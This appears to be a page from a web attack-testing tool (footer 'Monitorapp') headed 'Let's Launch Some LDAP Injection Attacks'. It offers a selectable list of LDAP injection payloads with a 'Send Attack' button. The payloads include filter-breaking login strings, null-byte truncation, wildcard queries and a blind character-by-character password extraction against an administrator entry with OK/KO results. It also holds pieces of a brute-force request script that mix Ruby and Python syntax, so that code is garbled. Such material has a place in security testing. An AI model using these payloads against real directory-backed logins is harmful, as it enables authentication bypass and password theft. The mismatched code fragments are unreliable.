HOME
ATTACKS
Let's Launch Some LDAP Injection Attacks
Select Attack Payload and Run it!
LDAP Injection Attacks
user=john)(&)
user=my_name)(cn=))%00
key1=value)(key2=*))(&(attribute=value
query = (&(uid=admin)(!(&(1=0)(userPassword=q))))
(&(uid=*)(uid=*))(|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))
(&(sn=administrator)(password=A*)) : KO
(&(sn=administrator)(password=MB*))
puts('[i] Looking for number #{i}')
alphabet = string.ascii_letters + string.digits + '_@{}-/()!\'$%=^[]:;'
r = requests.post(url, data = {'login':'*)('+str(i)+'=*))\x00', 'password':'bla'})
userPassword:2.5.13.18:=\xx\xx\xx
(&(sn=administrator)(password=MYC*)) : KO
(&(sn=administrator)(password=MYK*)) : OK
Send Attack
©
Monitorapp
All Right Reserved